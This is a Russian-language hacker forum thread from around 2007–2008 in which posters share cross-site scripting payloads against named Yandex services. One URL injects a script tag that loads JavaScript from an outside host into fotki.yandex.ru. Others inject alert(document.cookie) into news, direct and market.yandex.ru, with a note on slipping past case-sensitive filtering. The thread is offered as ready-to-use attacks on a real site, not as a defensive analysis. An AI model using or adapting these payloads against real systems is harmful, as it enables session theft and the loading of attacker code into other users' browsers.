Яндекс.Xss

Discussion in 'Уязвимости' started by NOmeR1, 16 Nov 2007.

  1. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    PHP:
    http://fotki.yandex.ru/actions/favorites-add.xml?author=lalala%22%3E%3Cscript%20src=%22http://toxa.nov.ru/s.js%22%3E%3C/script%3E
     
    _________________________
  2. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    И есчо XSS
    news.yandex.ru
    Code:
    http://news.yandex.ru/yandsearch?cl4url=&country="><script>alert(document.cookie)</script>
    Вот собственно XSS
    direct.yandex.ru
    Code:
    http://direct.yandex.ru/search?text=<h1><big>хек =\\</big></h1><script>alert(document.cookie)</script>
    И есчо ...

    market.yandex.ru
    Поиск:
    Code:
    <SCRIPT> alert(document.cookie); </SCRIPT>
    !Регистр имеет значение, ибо, хоть и слабая, но фильтрация!
    Code:
    http://market.yandex.ru/search.xml?cvredirect=1&text=<SCRIPT> alert(document.cookie); </SCRIPT>
     
    #22 Roba, 28 Dec 2007
    Last edited: 18 Jan 2008
    1 person likes this.